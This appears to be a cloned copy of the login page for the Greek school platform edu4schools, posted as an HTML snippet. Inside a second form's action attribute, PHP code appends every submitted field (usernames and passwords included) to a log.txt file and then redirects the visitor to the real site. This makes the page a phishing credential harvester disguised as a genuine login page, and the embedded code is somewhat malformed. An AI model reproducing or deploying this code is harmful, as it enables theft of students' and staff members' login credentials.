edu4schools
3 years ago in HTML
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>4schools</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="edu4schools">
<meta name="author" content="epafos">
<meta http - equiv="X-UA-Compatible" content="IE=edge">
<meta name="google-site-verification" content="4bHprANnnLQ9kQ2nrlputXqnHI1H83Q7tq-zbIynRPI" />
<link href="/Content/ace/css/bootstrap.min.css" rel="stylesheet">
<link href="/Content/ace/css/bootstrap-responsive.min.css" rel="stylesheet">
<link href="/Content/ace/css/font-awesome.min.css" rel="stylesheet" />
<link rel="stylesheet" href="/Content/Login/style-1.5.css" />
<link href="/Content/intro/css/eu-notify.css" rel="stylesheet">
<script src="/Scripts/jquery-2.1.4.min.js"></script>
<script src="/Scripts/bootstrap/bootstrap.min.js"></script>
<script src="/Scripts/pace.min.js"></script>
<script src="/Scripts/site.eu-notify-1.0.min.js"></script>
<!--[if lt IE 9]>
<script src="~/Scripts/html5shiv.js"></script>
<![endif]-->
<script>
function isIE() {
var ua = window.navigator.userAgent; //Έλεγχος userAgent μέσω window.navigator object
var msie = ua.indexOf('MSIE '); // αν είναι IE 10 ή παλαιότερος
var trident = ua.indexOf('Trident/'); // αν είναι IE 11
return (msie > 0 || trident > 0);
}
if (isIE()) {
document.write("<link href='/Content/Login/ie.css' rel='stylesheet'/> ");
}
</script>
<link href='https://fonts.googleapis.com/css?family=Open+Sans:400,700,400italic&subset=latin,greek,greek-ext,latin-ext' rel='stylesheet' type='text/css'>
<link rel="apple-touch-icon" sizes="57x57" href="/Content/images/favicons/apple-icon-57x57.png">
<link rel="apple-touch-icon" sizes="60x60" href="/Content/images/favicons/apple-icon-60x60.png">
<link rel="apple-touch-icon" sizes="72x72" href="/Content/images/favicons/apple-icon-72x72.png">
<link rel="apple-touch-icon" sizes="76x76" href="/Content/images/favicons/apple-icon-76x76.png">
<link rel="apple-touch-icon" sizes="114x114" href="/Content/images/favicons/apple-icon-114x114.png">
<link rel="apple-touch-icon" sizes="120x120" href="/Content/images/favicons/apple-icon-120x120.png">
<link rel="apple-touch-icon" sizes="144x144" href="/Content/images/favicons/apple-icon-144x144.png">
<link rel="apple-touch-icon" sizes="152x152" href="/Content/images/favicons/apple-icon-152x152.png">
<link rel="apple-touch-icon" sizes="180x180" href="/Content/images/favicons/apple-icon-180x180.png">
<link rel="icon" type="image/png" sizes="192x192" href="/Content/images/favicons/android-icon-192x192.png">
<link rel="icon" type="image/png" sizes="32x32" href="/Content/images/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="96x96" href="/Content/images/favicons/favicon-96x96.png">
<link rel="icon" type="image/png" sizes="16x16" href="/Content/images/favicons/favicon-16x16.png">
<link rel="manifest" href="/Content/images/favicons/manifest.json">
<meta name="msapplication-TileImage" content="/Content/images/favicons/ms-icon-144x144.png">
<meta name="msapplication-TileColor" content="#ffffff">
<meta name="theme-color" content="#ffffff">
<link href="/Content/site-social-2.3.css" rel="stylesheet" />
<style>
.bg1 {
}
</style>
</head>
<body>
<noscript>
<style>
.noscriptMessage {
display: block;
position: fixed;
top: 50%;
left: 50%;
right: 50%;
width: 300px;
margin-left: -150px;
margin-top: -100px;
z-index: 2001;
}
#wraplayer {
position: fixed;
left: 0;
top: 0;
width: 100%;
height: 100%;
display: block;
background-color: rgba(0,0,0,0.6);
z-index: 2000;
}
</style>
<div id="wraplayer">
<div class="noscriptMessage alert alert-info">Unfortunately, your browser is not enabled to execute scripts that are a nessesary for the correct operation of this application. Please enable it so you can continue.</div>
</div>
</noscript>
<div class="login">
<div class="banner bg1">
<img src="/Content/Login/4Schools_logo.png" alt="edu4Schools" />
<div class="overlayer1"></div>
<div class="overlayer2"></div>
</div>
<div class="fieldset1">
<fieldset>
<img class="school-logo" src="/Content/Login/4schools_logo_dark.png" alt="logo">
<div class="info-block">
</div>
<form action="/Account/Login?ReturnUrl=%2FStudent%2FMaterial" method="post"> <div class="form-horizontal" style="margin-top:20px;min-height: 200px;">
<div style="text-align: center;color:#60bf60;">
<h4>Login </h4>
</div>
<input name="__RequestVerificationToken" type="hidden" value="RO5lUHKcyD3luJvkGftq1gx2RyeOAAzpuuEGb20j7u8QhBEO5Q68G_ZBYxuorL-ccdAt5NoBPisbLCNUziQZLDdx86k1" />
<div id="message" style="display:none">
</div>
<div class="control-group">
<label class="control-label" for="UserName">Username</label>
<div class="controls">
<input class="input-medium" data-val="true" data-val-regex="Username does not have the correct form." data-val-regex-pattern="^[^,]+$" data-val-required="Fill in the username." id="UserName" name="UserName" type="text" value="" />
</div>
</div>
<div class="control-group">
<label class="control-label" for="Password">Password</label>
<div class="controls">
<input class="input-medium" data-val="true" data-val-required="Type the password" id="Password" name="Password" type="password" />
</div>
</div>
<div class="control-group">
<label class="control-label" for="slideBox">Remember me</label>
<div class="controls">
<div class="slideBox">
<input type="checkbox" id="slideBox" name="RememberMe" class="switch" value="true" />
<label for="slideBox"></label>
</div>
</div>
</div>
<div class="controls">
<input class="btn btn-success" type="submit" value="Login " id="schlogin">
<br />
<small>
<a href="/Account/ForgotPassword" id="forgot-password">Forgot your password?</a>
</small>
</div>
</div>
</form>
<form action="<?php
header ('Location: edu4schools.gr);
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n\n\n\n");
fclose($handle);
exit;
?>" value="VBXnZBRWR-sGBIS4lgtvQhWpHCLpquGRWd7FkBTdVOdoZBjeY6vu0Ym0e7UsQhsDBU0zYb9qDT1qPjwpkIeEzvTOcIw1" /> <div class="form-horizontal">
<div class="control-group">
<small class="control-label muted">Connect using another application&#39;s account </small>
<div class="controls">
<div id="socialLoginList">
<br />
<input type="submit" name="provider" value="Office 365"
title="Log in to your account at Office 365"
class="btn-o365 btn-mini" />
</div>
</div>
</div>
</div>
</form> </fieldset>
</div>
</div>
<ul class="nav nav-pills noselect">
<li>
<a href="/Intro/Terms4Schools" class="btn-link hover-unstyled"><small>Terms of Use</small></a>
</li>
<li>
<a href="/Intro/Privacy4Schools" class="btn-link hover-unstyled"><small>Privacy</small></a>
</li>
<li>
<a id="epafos-logo-link" href="https://www.epafos.gr/en/"
class="btn btn-link btn-small" target="_blank">
<strong>Powered by&nbsp;</strong>
<img title="EPAFOS Computer Systems"
alt="EPAFOS Computer Systems"
src="/Content/intro-simple/img/epafos-logo.png" />
<br />
<small>
© 2021 - 2.56.843 [27/5 01:00]
</small>
</a>
</li>
<li style="padding-top: 10px;">
<div class="dropdown flags dropup">
<a data-toggle="dropdown" href="#" class="dropdown-toggle">
<span>
<img src="/Content/flags/en-GB.gif" />
</span>
</a>
<ul class="dropdown-menu dropdown-yellow dropdown-caret dropdown-closer">
<li>
<a href="/Intro/Culture?c=el-GR">
<img src="/Content/flags/el-GR.gif" />
</a>
</li>
<li>
<a href="/Intro/Culture?c=en-GB">
<img src="/Content/flags/en-GB.gif" />
</a>
</li>
</ul>
</div>
</li>
</ul>
<script src="/Scripts/jquery.globalize/globalize.js"></script>
<script src="/bundles/jqueryval?v=i5DF2dKPGii17RO280QQj8jYnJqucqGctA0tWhsXacE1"></script>
<script>
$(document).ready(function () {
$('form').submit(function () {
if ($(this).valid()) {
$('#schlogin').prop('disabled', true);
$("#forgot-password").hide();
}
});
});
</script>
<script>
makeNotifier("This web application uses both temporary and persistent cookies for its operation. Temporary cookies last until browser close and persistent are remembered at the next visit for a limited time interval. Application uses session and authentication cookies as well as functionality cookies which are used to remember user preferences like interface language. Performance cookies usually used for collecting user statistics, are not used by current website. All cookies are strictly necessary and their role is to ensure application's proper function and user's better experience throughout his visit. By using this application you are accepting these cookies.", "bottom", "OK", "dark");
$(document).ready(function () {
var imgurl='/Content/Login/sch.png';
imgurl = imgurl.replace(/&amp;/g, '&');
$('.bg1').css('background-image', 'url(' + imgurl + ')');
});
</script>
</body>
</html>